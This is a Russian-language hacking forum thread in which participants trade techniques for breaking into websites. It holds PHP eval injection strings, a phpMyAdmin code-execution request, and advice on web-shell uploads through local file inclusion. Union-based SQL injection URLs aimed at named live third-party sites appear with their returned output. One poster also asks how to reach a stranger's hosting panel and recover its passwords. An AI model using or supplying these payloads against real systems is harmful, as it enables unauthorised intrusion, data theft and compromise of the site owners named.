А ты посмотри ^_^ Там кароче бага в чём, надо закрыть ковычку, и дописать свой код, а т.к. ковычка экранируется, нечего не получится. Ну на словах я Лев толстой, а на деле ... простой. Покажу. И так. Есть у нас создание конфига, там вписать можно небольшое количество параметров. Вообще без разницы куда вписывать, но лучше в host. Если мы пишем хост: localhost, то в конфиге. PHP: $host = 'localhost'; А нам же надо закрыть ковычку. Мы пишем значит, localhost'; eval($_GET[c]); // И получается нечто вроде: PHP: $host = 'localhost\';eval($_GET[c]); // Э, куда ковычки деются? ПАШКЕЛЛА ПОХЕКАЛ МОЙ ПОСТ! Сам догадаешься причём там mq ? Или ты мне хочешь показать особые условия?
привет всем, есть одна проблема. Суть: Есть админка. Могу загружать файлы любых типов. Скрипты, doc, pdf, всякие идут в папку files, изображения в папку gallery. Но в папке files запрещены выполнение скриптов=(((. Что делать, посоветуйте пожалуйста...
Я не вникал в тему, но разве нельзя использовать {}? Что-то вроде: PHP: <?php $sting = ${@eval($_REQUEST[c])}; ?> Конечно, если я правильно, и речь идет о pma code exec. У меня спокойно срабатывал такой вариант, ведь там помоему используется preg_replace, второй аргумент которого находится в двойных кавычках, что дает нам право на подстановку иполняемых данных. Опять же, если я правильно въехал. //upd. Все верно, кавычки там идут лесом, вполне срабатывает такой запрос: Code: /phpmyadmin/server_databases.php?pos=0&dbstats=0&sort_by={${die(phpinfo())}}&sort_order=desc&token=1957
В таком случае, поищи в админке LFI, очень часто именно в админской части сайта меньше всего защиты от атак. Достаточно часто сталкивался с таким способом заливки, когда льется только картинка, и хтаццесс не залить, то лил картинку набитую кодом шелла, и инклудил в админке.
Вот скуля в е107 модуле: http://www.lighterlifecommunity.co.uk/e107_plugins/userjournals_menu/userjournals.php?blog.-2719+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13+--+ Принтабельные поля: 3,5,7. Но почему когда вместо принтабельного поля вводишь например user() или version() ничего не выводит? И как организовать вывод?
http://www.lighterlifecommunity.co.uk/e107_plugins/userjournals_menu/userjournals.php?blog.-2719+union+select+1,2,@@version,4,5,6,7,8,9,10,11,12,13+--+ 5.0.81-log
Ну типо ми тоже про /scripts/setup.php. На проверь: Code: http://www.melancholy.ru/phpmyadmin/scripts/setup.php и объясни мне все таки, юзал ли ты хоть раз этот сплойт и почему в данном случае (как и во всех других) он прекрасно работает и при magic_quotes=on Если мы вообще говорим об одном и том же сплойте: http://snipper.ru/view/12/phpmyadmin-2119-unserialize-arbitrary-php-code-execution-exploit/ про который вообще-то изначально писал wildshaman
А почему не работают обычные функции? Как например вывести данные из бд? Или вот другой пример: http://www.salvationprophecy.com/e107_plugins/userjournals_menu/userjournals.php?blog.-43++union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14+--+ там даже @@version не работает.
Скажу прямо...как узнать по имени домена где находится панель управления хостингом. Может у вас есть варианты...всё перерыл ничего не нашел. кудато попал...но там ни данных подключения ничего нет...прсото написано, что у вас есть хостинг и всё )
Ага, спасибо так и сделал, хостер сказал что у вас домен резолвится на VPS а впс не наш. вобщем я нашел этот впс, нашел ссылки до phpmyadmin и ispmanagera....есть много инофрмации о хозяине. но не знаю что дальше делать....тупик. Хотел восстановить на мыло пасы от ISP так оказывается нет такой функции...
